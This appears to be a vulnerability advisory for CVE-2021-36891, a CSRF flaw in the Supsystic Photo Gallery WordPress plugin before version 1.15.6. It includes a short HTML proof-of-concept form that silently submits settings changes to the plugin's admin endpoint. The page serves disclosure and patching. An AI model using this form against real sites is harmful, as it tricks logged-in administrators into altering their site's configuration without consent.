Photo Gallery by Supsystic < 1.15.6 – Arbitrary Settings Update via CSRF | CVE 2021-36891 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=supsystic-gallery&module=settings&action=saveSettings" method="POST">
      <input type="hidden" name="settings[send_stats]" value="1" />
      <input type="hidden" name="settings[image_editor]" value="aaaaa" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

gallery-by-supsystic

Fixed in 1.15.6

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Rasi Afeef

Verified

Yes

WPVDB ID

b06f0ec2-edd7-468d-88dd-84ca15c3911e

Timeline

Publicly Published

2022-06-15 (about 3 years ago)

Added

2022-06-16 (about 3 years ago)

Last Updated

2023-03-19 (about 2 years ago)

Other

Published

Title

Published

2025-06-19

Title

XML Travel Portal Widget <= 2.0 - Cross-Site Request Forgery

Published

2025-08-22

Title

Simple Statistics for Feeds < 20250820 - Cross-Site Request Forgery

Published

2023-12-27

Title

Quiz And Survey Master < 8.1.19 - Quiz Results Deletion via CSRF

Published

2026-01-04

Title

Add Polylang support for Customizer <= 1.4.5 - Cross-Site Request Forgery

Published

2025-01-06

Title

DirectoryPress < 3.6.20 - Cross-Site Request Forgery to Cross-Site Scripting